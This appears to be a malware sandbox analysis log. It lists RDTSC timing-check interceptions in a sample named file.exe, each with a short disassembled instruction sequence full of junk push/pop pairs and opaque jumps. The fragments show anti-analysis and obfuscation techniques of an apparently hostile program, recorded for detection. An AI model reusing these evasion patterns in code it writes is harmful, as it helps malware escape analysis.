Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAFBA3 second address: DAFBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB0223 second address: DB0238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E21h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB0238 second address: DB0267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 ja 00007F99D0DE6F28h 0x0000000e jc 00007F99D0DE6F2Ch 0x00000014 jo 00007F99D0DE6F26h 0x0000001a pushad 0x0000001b jmp 00007F99D0DE6F30h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB0758 second address: DB0763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F99D0D12E16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB0763 second address: DB0780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0DE6F2Fh 0x00000009 jp 00007F99D0DE6F26h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D829AA second address: D649B9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99D0D12E1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F99D0D12E22h 0x00000011 nop 0x00000012 sub dx, BF80h 0x00000017 call dword ptr [ebp+122D2739h] 0x0000001d push edi 0x0000001e jmp 00007F99D0D12E1Ch 0x00000023 je 00007F99D0D12E24h 0x00000029 jmp 00007F99D0D12E1Ch 0x0000002e pushad 0x0000002f popad 0x00000030 pop edi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F99D0D12E1Bh 0x00000038 js 00007F99D0D12E2Bh 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D82F43 second address: D82F47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D82F47 second address: BBEA6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F99D0D12E1Ch 0x0000000c popad 0x0000000d nop 0x0000000e mov dx, si 0x00000011 push dword ptr [ebp+122D13FDh] 0x00000017 xor edx, dword ptr [ebp+122D2A67h] 0x0000001d call dword ptr [ebp+122D3960h] 0x00000023 pushad 0x00000024 mov dword ptr [ebp+122D2374h], eax 0x0000002a xor eax, eax 0x0000002c je 00007F99D0D12E1Eh 0x00000032 jmp 00007F99D0D12E20h 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b jmp 00007F99D0D12E1Dh 0x00000040 mov dword ptr [ebp+122D2CCFh], eax 0x00000046 pushad 0x00000047 pushad 0x00000048 xor edi, dword ptr [ebp+122D2CB7h] 0x0000004e popad 0x0000004f mov si, di 0x00000052 popad 0x00000053 mov esi, 0000003Ch 0x00000058 mov dword ptr [ebp+122D285Ah], eax 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 jmp 00007F99D0D12E27h 0x00000067 lodsw 0x00000069 jg 00007F99D0D12E1Ch 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 jno 00007F99D0D12E1Ch 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d jp 00007F99D0D12E1Ch 0x00000083 mov dword ptr [ebp+122D2374h], ebx 0x00000089 nop 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d pushad 0x0000008e popad 0x0000008f jmp 00007F99D0D12E23h 0x00000094 popad 0x00000095 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D82FBC second address: D83013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xor dword ptr [esp], 6238C374h 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F99D0DE6F28h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov edx, dword ptr [ebp+122D28BCh] 0x0000002e je 00007F99D0DE6F28h 0x00000034 mov edi, eax 0x00000036 push F1C40DA4h 0x0000003b push eax 0x0000003c push edx 0x0000003d jg 00007F99D0DE6F32h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D83133 second address: D83194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F99D0D12E1Dh 0x0000000e jmp 00007F99D0D12E27h 0x00000013 popad 0x00000014 xchg eax, esi 0x00000015 adc edi, 3239F41Ch 0x0000001b jmp 00007F99D0D12E27h 0x00000020 push eax 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F99D0D12E21h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D834A7 second address: D834AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D834AB second address: D834C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a jmp 00007F99D0D12E20h 0x0000000f pop edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7CFD5 second address: D7CFD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7CFD9 second address: D7CFDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D83D0C second address: D83D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0DE6F2Ah 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F99D0DE6F28h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 lea eax, dword ptr [ebp+12497757h] 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F99D0DE6F28h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 00000017h 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D83D69 second address: D83D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D83D6F second address: D83DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F99D0DE6F28h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 mov edx, dword ptr [ebp+122D179Fh] 0x00000029 pushad 0x0000002a pushad 0x0000002b and ebx, dword ptr [ebp+122D221Eh] 0x00000031 mov esi, ecx 0x00000033 popad 0x00000034 mov edi, 648D5202h 0x00000039 popad 0x0000003a mov dword ptr [ebp+122D26B4h], ebx 0x00000040 lea eax, dword ptr [ebp+12497713h] 0x00000046 mov dword ptr [ebp+122D2923h], esi 0x0000004c nop 0x0000004d jmp 00007F99D0DE6F2Fh 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D83DD7 second address: D83DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB48F4 second address: DB4916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F99D0DE6F39h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBC8B6 second address: DBC8CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBC8CF second address: DBC8D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBCA1F second address: DBCA25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBCA25 second address: DBCA2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBCA2B second address: DBCA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F99D0D12E16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBCA35 second address: DBCA39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBCBC3 second address: DBCBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBC5DA second address: DBC5E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBC5E7 second address: DBC5EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBD495 second address: DBD49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBD49A second address: DBD4AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0D12E1Bh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBD4AB second address: DBD4BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F99D0DE6F26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC4CBC second address: DC4CCE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F99D0D12E16h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC4CCE second address: DC4CD8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F99D0DE6F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC4CD8 second address: DC4CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC7CF9 second address: DC7D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F99D0DE6F32h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC7542 second address: DC754A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC754A second address: DC754E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC7841 second address: DC7847 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC7847 second address: DC7850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC7850 second address: DC7883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F99D0D12E16h 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F99D0D12E22h 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 jnl 00007F99D0D12E1Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC7A13 second address: DC7A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F99D0DE6F26h 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f jnp 00007F99D0DE6F2Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD004D second address: DD005C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007F99D0D12E16h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD05F5 second address: DD060B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F32h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD0908 second address: DD090E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD0AAF second address: DD0AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD0AB3 second address: DD0ACA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007F99D0D12E16h 0x00000013 pop esi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD4C4C second address: DD4C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD4C57 second address: DD4C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD4C5B second address: DD4C6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F99D0DE6F26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD4F30 second address: DD4F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD507E second address: DD50B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F99D0DE6F37h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F99D0DE6F34h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD5216 second address: DD522D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F99D0D12E1Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD522D second address: DD523A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD523A second address: DD5240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD5240 second address: DD5245 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD5245 second address: DD524F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDDF03 second address: DDDF21 instructions: 0x00000000 rdtsc 0x00000002 je 00007F99D0DE6F40h 0x00000008 jmp 00007F99D0DE6F34h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDE1EC second address: DDE1F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDE1F7 second address: DDE1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDEADE second address: DDEAEF instructions: 0x00000000 rdtsc 0x00000002 je 00007F99D0D12E18h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDEAEF second address: DDEAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDEDBA second address: DDEDC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D83A8F second address: D83A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDFC21 second address: DDFC42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F99D0D12E1Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE3F42 second address: DE3F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE31FE second address: DE3202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE3202 second address: DE3217 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99D0DE6F26h 0x00000008 ja 00007F99D0DE6F26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE3217 second address: DE3226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0D12E1Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE3933 second address: DE395D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99D0DE6F2Ah 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F99D0DE6F38h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF086D second address: DF0872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF0872 second address: DF0898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jnl 00007F99D0DE6F26h 0x0000000e popad 0x0000000f jl 00007F99D0DE6F2Eh 0x00000015 jnp 00007F99D0DE6F26h 0x0000001b pushad 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 push edx 0x00000025 pop edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF0898 second address: DF08C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F99D0D12E1Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F99D0D12E16h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEE950 second address: DEE956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEEAC6 second address: DEEACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEED40 second address: DEED57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F99D0DE6F28h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007F99D0DE6F26h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEED57 second address: DEED5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEED5B second address: DEED61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF0B9 second address: DEF104 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E23h 0x00000007 jmp 00007F99D0D12E20h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F99D0D12E1Ch 0x00000014 jno 00007F99D0D12E16h 0x0000001a jmp 00007F99D0D12E1Ah 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF104 second address: DEF10C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF10C second address: DEF128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F99D0D12E27h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF3FD second address: DEF401 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF401 second address: DEF407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF56D second address: DEF571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF571 second address: DEF599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F99D0D12E26h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF599 second address: DEF5AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0DE6F30h 0x00000009 rdtsc
